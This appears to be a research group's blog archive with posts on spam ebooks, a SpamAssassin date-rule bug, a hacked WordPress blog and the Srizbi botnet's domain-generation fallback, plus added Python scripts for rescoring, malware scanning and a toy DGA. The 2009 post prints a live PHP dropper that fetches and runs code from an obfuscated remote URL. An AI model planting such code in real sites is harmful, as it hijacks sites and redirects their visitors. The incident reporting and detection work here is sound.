April 6th, 2011
Publishing trends has a good post describing a new variation on spam: creating low-quality ebooks from plagiarized or public-domain content and selling them in ebook markets like Amazon’s Kindle store. If you want to MAKE.MONEY.FAST there are people willing to help:
Automatically detecting these spam ebooks might be a good machine learning project. One problem is that using features of the ebook itself (e.g., poor formatting) might require purchasing it. But there are sure to be many useful features that the ebook store provides for free that might support an effective classifier.
(h/t Bruce Schneier)
January 1st, 2010
Shades of Y2K! Mike Cardwell reports on a rule in Spamassassin that judges any message sent in or after 2010 as “grossly in the future” and treats this as evidence of it being spam. I just checked and found that our mail server’s Spamassassin is using this buggy FH_DATE_PAST_20XX rule.
If you are using Spamassassin, or think your mail server might be, check the source of mail you have received today. Here’s an example from one of my messages this morning.
X-Spam-Checker-Version: SpamAssassin 3.2.5 ... on mail.cs.umbc.edu
X-Spam-Status: No, score=1.6 required=5.0 tests=AWL,FH_DATE_PAST_20XX
Received: from mail-yw0-f142.google.com (mail-yw0-f142.google.com
[220.127.116.11]) by mail.cs.umbc.edu (8.14.3/8.14.3) with ESMTP
id o01DjJUn011187; Fri, 1 Jan 2010 08:45:19 -0500 (EST)
If the message exceeds the local spam score threshold, you may find a block with more details in your message headers, like this example.
Content analysis details: (6.1 points, 5.0 required)
pts rule name description
---- ---------------------- ----------------------------------
3.4 FH_DATE_PAST_20XX The date is grossly in the future.
-4.0 RCVD_IN_DNSWL_MED RBL: Sender listed at http://www.dnswl.org/,
medium trust [18.104.22.168 listed in list.dnswl.org]
1.8 SUBJ_ALL_CAPS Subject is all capitals
0.7 MSOE_MID_WRONG_CASE MSOE_MID_WRONG_CASE
4.2 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
As a workaround until your server updates Spamassassin, the points that the rule adds to a message’s spam score can be lowered to 0.0 in Spamassassin’s configuration file (local.cf) or your own user-prefs file.
score FH_DATE_PAST_20XX 0.0
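To check quickly whether your own mail was hit, and what the workaround does to the score, here is a small script I'm adding to this post (it is not part of SpamAssassin). It parses the X-Spam-Status header and the "Content analysis details" block quoted above, reproduces the date regex as I remember it from the 3.2.x rule set (an assumption; confirm against the rule file in your own rules directory), and recomputes the total with the rule zeroed the way the local.cf line above does.

```python
import re

# Constructed sample data, copied from the headers quoted in the post above.
SAMPLE_STATUS = "X-Spam-Status: No, score=1.6 required=5.0 tests=AWL,FH_DATE_PAST_20XX"
SAMPLE_DATE = "Fri, 1 Jan 2010 08:45:19 -0500 (EST)"
SAMPLE_REPORT = """\
Content analysis details: (6.1 points, 5.0 required)
pts rule name description
---- ---------------------- ----------------------------------
3.4 FH_DATE_PAST_20XX The date is grossly in the future.
-4.0 RCVD_IN_DNSWL_MED RBL: Sender listed at http://www.dnswl.org/,
medium trust [18.104.22.168 listed in list.dnswl.org]
1.8 SUBJ_ALL_CAPS Subject is all capitals
0.7 MSOE_MID_WRONG_CASE MSOE_MID_WRONG_CASE
4.2 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
"""

# The rule body as I remember it from the 3.2.x rule set (an assumption, check
# your own rules directory):  header FH_DATE_PAST_20XX  Date =~ /20[1-9][0-9]/
# Any four-digit year from 2010 through 2099 matches, so the rule fired on
# every message dated in 2010 instead of only on dates years in the future.
BUGGY_DATE_RE = re.compile(r"20[1-9][0-9]")

def buggy_rule_fires(date_header):
    """True when the broken regex would hit this Date: header value."""
    return BUGGY_DATE_RE.search(date_header) is not None

def parse_status(line):
    """Return (score, required, [tests]) from an X-Spam-Status header."""
    m = re.search(r"score=(-?[\d.]+)\s+required=([\d.]+)\s+tests=(\S+)", line)
    if not m:
        raise ValueError("not an X-Spam-Status header: %r" % line)
    return float(m.group(1)), float(m.group(2)), m.group(3).split(",")

def affected(status_line):
    """True when the message was scored with FH_DATE_PAST_20XX."""
    return "FH_DATE_PAST_20XX" in parse_status(status_line)[2]

def parse_report(text):
    """Return {rule: points} from a 'Content analysis details' block.
    Only lines starting with a signed number are rule lines; the header,
    the dashes and wrapped description text are skipped."""
    rules = {}
    for line in text.splitlines():
        m = re.match(r"^\s*(-?\d+\.\d+)\s+([A-Z0-9_]+)\b", line)
        if m:
            rules[m.group(2)] = float(m.group(1))
    return rules

def rescore(rules, overrides):
    """Total after applying local.cf 'score RULE x.x' overrides, one decimal like SA."""
    return round(sum(overrides.get(r, pts) for r, pts in rules.items()), 1)

if __name__ == "__main__":
    rules = parse_report(SAMPLE_REPORT)
    print("buggy rule fires on %r: %s" % (SAMPLE_DATE, buggy_rule_fires(SAMPLE_DATE)))
    print("tagged by FH_DATE_PAST_20XX:", affected(SAMPLE_STATUS))
    print("score as shipped:", rescore(rules, {}))
    print("score with 'score FH_DATE_PAST_20XX 0.0':", rescore(rules, {"FH_DATE_PAST_20XX": 0.0}))
```

With the sample report the message drops from 6.1 to 2.7 once the rule is zeroed, which is below the 5.0 threshold; that is the effect you want from the local.cf line, and it is all the workaround does, so upgrade when your distribution ships the fixed rule.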
May 21st, 2009
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.
<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
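For anyone who wants to look for the same thing in their own WordPress tree, here is a scanner I'm adding to this post (my own code, not part of WordPress). It flags the combination that makes this dropper what it is, code built at runtime from remotely fetched content, decodes the strrev'd literal so the real URL is visible, and pulls out the GET parameter the payload keys on (the ?qq= in the URLs above). The sample input is the injected line quoted above with its opening tag repaired; nothing in it fetches the decoded URL.

```python
import os
import re

# Constructed samples. INFECTED is the injected line quoted in the post above
# (with the "<?php" tag repaired) followed by a normal theme line; CLEAN is a
# snippet of an ordinary WordPress template. Nothing here fetches the URL.
INFECTED = r"""<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
<?php get_header(); ?>"""
CLEAN = """<?php get_header(); ?>
<?php if (have_posts()) : while (have_posts()) : the_post(); ?>"""

# PHP calls that rarely belong at the top of a theme file. Each one alone is
# only a hint; the combination checked in scan() is the dropper's signature.
SUSPICIOUS_CALLS = ("create_function", "file_get_contents", "strrev", "eval",
                    "base64_decode", "gzinflate")

def reversed_literals(src):
    """Decode every strrev("...") literal so the hidden string is readable."""
    return [s[::-1] for s in re.findall(r'strrev\(\s*"([^"]*)"\s*\)', src)]

def trigger_param(src):
    """Name of the GET parameter the payload keys on ($param="..."), or None."""
    m = re.search(r'\$param\s*=\s*"(\w+)"', src)
    return m.group(1) if m else None

def scan(src):
    """Return a list of findings for one PHP source string (empty == clean)."""
    findings = [c for c in SUSPICIOUS_CALLS if re.search(r"\b%s\s*\(" % c, src)]
    # Code assembled at runtime from remote content is the decisive indicator.
    if re.search(r"create_function\s*\(.*?file_get_contents\s*\(", src, re.S):
        findings.append("remote-code-in-create_function")
    findings.extend("strrev-decodes-to:" + s for s in reversed_literals(src))
    return findings

def scan_tree(root):
    """Scan every .php file under root; yield (path, findings) for hits only."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, errors="replace") as f:
                    hits = scan(f.read())
                if hits:
                    yield path, hits

if __name__ == "__main__":
    print("infected sample:", scan(INFECTED))
    print("trigger parameter:", trigger_param(INFECTED))
    print("clean sample:", scan(CLEAN))
```

Run scan_tree() over the WordPress document root (themes, plugins and wp-content/uploads are the usual places) and compare the result with a clean copy of the same release; the reversed-string trick is only one obfuscation, so the base64_decode and gzinflate hits are worth reading too.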
We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
The results of this Google search reveal many compromised blogs from the .edu domain.
November 30th, 2008
Just like Freddy Krueger, botnets are hard to kill.
In a series of posts on his Security Fix blog, Brian Krebs provides a good explanation of how the Srizbi botnet was able to come back to life after being killed (we thought!) earlier this month.
“The botnet Srizbi was knocked offline Nov. 11 along with Web-hosting firm McColo, which Internet security experts say hosted machines that controlled the flow of 75 percent of the world’s spam. One security firm, FireEye, thought it had found a way to prevent the botnet from coming back online by registering domain names it thought Srizbi was likely to target. But when that approach became too costly for the firm, they had to abandon their efforts.”
In an example of good distributed programming design, the botnet had a backup plan in case its control servers were taken down.
“The malware contained a mathematical algorithm that generates a random but unique Web site domain name that the bots would be instructed to check for new instructions and software updates from its authors. Shortly after McColo was taken offline, researchers at FireEye said they deciphered the instructions that told computers infected with Srizbi which domains to seek out. FireEye researchers thought this presented a unique opportunity: If they could figure out what those rescue domains would be going forward, anyone could register or otherwise set aside those domains to prevent the Srizbi authors from regaining control over their massive herd of infected machines.”
Unfortunately, FireEye did not have the resources to carry out its plan and was forced to abandon it, but not before seeking help from other companies and organizations with deeper pockets.
“A week ago, FireEye researcher Lanstein said they were looking for someone else to register the domain names that the Srizbi bots might try to contact to revive themselves. He said they approached other companies such as VeriSign Inc. and Microsoft Corp. After FireEye abandoned its efforts, some other members of the computer security community said they reached out for help from the United States Computer Emergency Readiness Team, or US-CERT, a partnership between the Department of Homeland Security and the private sector to combat cybersecurity threats.”
File this one under opportunity, lost.
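To make the arithmetic behind that lost opportunity concrete, here is a toy version of the scheme I'm adding to this post. It is my own illustration, not Srizbi's algorithm (nothing about the real one is on this page): the seed, the domains-per-day count and the TLD list are all assumptions. Bot and analyst derive the same daily list from the seed and the date, so a defender who knows the algorithm can register the names in advance; the cost function shows why holding them grows linearly with days times domains per day, which is what FireEye ran into.

```python
import hashlib
from datetime import date, timedelta

# Assumptions for the illustration: a secret baked into the bot (the real
# botnet's constant is not on this page) and a fixed set of TLDs.
SEED = b"illustrative-bot-seed"
TLDS = ("com", "net", "info")
START = date(2008, 11, 12)  # the day after the McColo takedown mentioned above

def dga_domains(day, n=8, seed=SEED):
    """Rendezvous domains for one calendar day. Bot and analyst both get the
    same list from (seed, day), which is what made pre-registration possible."""
    out = []
    for i in range(n):
        h = hashlib.sha256(seed + day.isoformat().encode() + bytes([i])).digest()
        label = "".join(chr(ord("a") + b % 26) for b in h[:10])
        out.append("%s.%s" % (label, TLDS[h[10] % len(TLDS)]))
    return out

def bot_rendezvous(day, live_domains):
    """Bot side: walk today's list and take the first name that answers."""
    for dom in dga_domains(day):
        if dom in live_domains:
            return dom
    return None

def registration_plan(start, days, n=8):
    """Defender side: every domain to hold from start for the next `days` days."""
    return {start + timedelta(days=k): dga_domains(start + timedelta(days=k), n)
            for k in range(days)}

def registration_cost(plan, price_per_domain):
    """Cost of the plan; it grows with days x domains-per-day, the arithmetic
    that made defensive registration too expensive to sustain."""
    return len({d for doms in plan.values() for d in doms}) * price_per_domain

if __name__ == "__main__":
    plan = registration_plan(START, 30)
    print("30-day plan covers %d domains" % sum(len(v) for v in plan.values()))
    print("cost at $10 each: $%d" % registration_cost(plan, 10))
    held = set(plan[START])          # defender only registered day one
    print("bot on day 1 reaches:", bot_rendezvous(START, held))
    print("bot on day 30 reaches:", bot_rendezvous(max(plan), held))
```

The last two lines are the whole story: a sinkhole that covers only the days you could afford buys nothing once the calendar moves past them, because the bots simply compute the next day's names and try again.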